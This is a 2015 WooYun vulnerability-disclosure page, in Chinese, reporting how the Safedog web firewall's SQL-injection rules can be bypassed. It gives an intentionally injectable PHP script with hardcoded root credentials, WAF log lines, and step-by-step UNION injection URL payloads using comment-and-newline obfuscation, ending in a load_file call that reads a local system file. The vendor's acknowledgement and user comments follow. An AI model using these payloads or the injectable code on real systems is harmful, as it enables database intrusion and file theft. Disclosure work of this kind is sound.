Bypass安全狗SQL的UNION注入

发表于 2015年06月24日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0122601

漏洞标题：Bypass安全狗SQL的UNION注入

漏洞详情

披露状态：

2015-06-24: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认，细节仅向厂商公开
2015-06-28: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-08-19: 细节向核心白帽子及相关领域专家公开
2015-08-29: 细节向普通白帽子公开
2015-09-08: 细节向实习白帽子公开
2015-09-23: 细节向公众公开

简要描述：

让自己无路可走！！！！

详细说明：

版本：

官网Apache最新版.3.1.09924测试脚本：test.php

<?<br>
$id = $_REQUEST['id'];<br>
if(!$conn = @mysql_connect("localhost", "root", "123456"))<br>
die('<font size=+1>An Error Occured</font><hr>unable to connect to the database.');<br>
$text = "select * from test.user where id=".$id;<br>
$rs = mysql_query ($text,$conn);<br>
while($rom = mysql_fetch_array($rs))<br>
{<br>
echo $rom["username"];<br>
}<br>
?>

<?

$id = $_REQUEST['id'];

if(!$conn = @mysql_connect("localhost", "root", "123456"))

die('An Error Occured<hr>unable to connect to the database.');

$text = "select * from test.user where id=".$id;

$rs = mysql_query ($text,$conn);

while($rom = mysql_fetch_array($rs))

{

echo $rom["username"];

}

**.**.**.**/test.php?id=4 and 1=2 union select 1,2,3,4,5,6,7,8,9,10

1	.../test.php?id=4 and 1=2 union select 1,2,3,4,5,6,7,8,9,10

从防护日志中：

**.**.**.**访问**.**.**.**65,拦截原因:防止复杂的and or 方式注入规则二,可疑内容:4 and 1

1	...访问...65,拦截原因:防止复杂的and or 方式注入规则二,可疑内容:4 and 1

首先来绕过 and 1 这个拦截策略将and 1=1 改成 and%23fuck%0a1=2这里使用：

**.**.**.**/test.php?id=4+and%23fuck%0a1=2+union+select+1,2,3,4,5,6,7,8,9,10

1	.../test.php?id=4+and%23fuck%0a1=2+union+select+1,2,3,4,5,6,7,8,9,10

但是还是被拦截了，但这时防护日志是这样的：

**.**.**.**访问**.**.**.**65,拦截原因:防止SQL联合查询,可疑内容:union select 1,2,3,4,5,6,7,8,9,10

1	...访问...65,拦截原因:防止SQL联合查询,可疑内容:union select 1,2,3,4,5,6,7,8,9,10

OK，还是能绕过将select 改成 %23qfuck%0Aselect完整URL:

**.**.**.**/test.php?id=4+and%23fuck%0a1=2+union+%23qa%0Aselect+1,2,3,4,5,6,7,8,9,10

1	.../test.php?id=4+and%23fuck%0a1=2+union+%23qa%0Aselect+1,2,3,4,5,6,7,8,9,10

这时已经成功绕过。

来读取个本地文件试试C:\WINDOWS\system32\drivers\etc\hosts

**.**.**.**/test.php?id=4+and%23fuck%0a1=2+union+%23qa%0Aselect+1,(load_file(0x433a5c57494e444f57535c73797374656d33325c647269766572735c6574635c686f737473)),3,4,5,6,7,8,9,10

1	.../test.php?id=4+and%23fuck%0a1=2+union+%23qa%0Aselect+1,(load_file(0x433a5c57494e444f57535c73797374656d33325c647269766572735c6574635c686f737473)),3,4,5,6,7,8,9,10

漏洞证明：

**.**.**.**/test.php?id=4+and%23fuck%0a1=2+union+%23qa%0Aselect+1,(load_file(0x433a5c57494e444f57535c73797374656d33325c647269766572735c6574635c686f737473)),3,4,5,6,7,8,9,10

1	.../test.php?id=4+and%23fuck%0a1=2+union+%23qa%0Aselect+1,(load_file(0x433a5c57494e444f57535c73797374656d33325c647269766572735c6574635c686f737473)),3,4,5,6,7,8,9,10

修复方案：

更新规则

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-06-2509:25

厂商回复：

最近乌云的小伙伴真是太给力了，感谢大家的反馈，我们将尽快修复。
再次赞一下乌云的小伙伴！

评价

2010-01-01 00:00 孔卡白帽子 | Rank:30 漏洞数:3)

对于这种人，那纯属神经病！
2010-01-01 00:00 testKaI 白帽子 | Rank:2 漏洞数:1)

又少了一招打狗棒法
2010-01-01 00:00 昌维白帽子 | Rank:13 漏洞数:1)

为了7rank提交有意思？摸摸自己的良心问问自己这洞是你挖出来的吗？
2010-01-01 00:00 huoji 白帽子 | Rank:26 漏洞数:4)

对于这种人，那纯属神经病！
2010-01-01 00:00 小菜大师白帽子 | Rank:0 漏洞数:0)

哎这种人也老火挖不出来漏洞也只能提交这种了
2010-01-01 00:00 金馆长白帽子 | Rank:0 漏洞数:1)

对于这种人，那纯属神经病！
2010-01-01 00:00 二愣子白帽子 | Rank:99 漏洞数:8)

对于这种人，我只想说“请联系我”
2010-01-01 00:00 草榴社区白帽子 | Rank:85 漏洞数:14)

为了7rank提交有意思？摸摸自己的良心问问自己这洞是你挖出来的吗？
2010-01-01 00:00 Mark0smith 白帽子 | Rank:20 漏洞数:2)

#fuck
And+1=2+
2010-01-01 00:00 J0kER 白帽子 | Rank:71 漏洞数:8)

洞主应该分析下原理
2010-01-01 00:00 sOnsec 白帽子 | Rank:61 漏洞数:7)

- - 给不给留活路啊
2010-01-01 00:00 白无常白帽子 | Rank:85 漏洞数:6)

洞主怕被骂，路人甲= =
2010-01-01 00:00 小2b 白帽子 | Rank:0 漏洞数:0)

为了7rank提交有意思？摸摸自己的良心问问自己这洞是你挖出来的吗？
2010-01-01 00:00 黑名单白帽子 | Rank:52 漏洞数:8)

为了7rank提交有意思？摸摸自己的良心问问自己这洞是你挖出来的吗？
2010-01-01 00:00 Mark 白帽子 | Rank:38 漏洞数:3)

对于这种人，那纯属神经病！
2010-01-01 00:00 http://www.wooyun.org/corps/安全狗白帽子 | Rank:0 漏洞数:0)

@Mark 其实你应该这么看，就算他不提交，也不一定能流到您的手里，您说是不是。
提交了，您看到详情了，增长了姿势，也或许给您灵感了，搞不好能从其他地方又找到绕过的地方。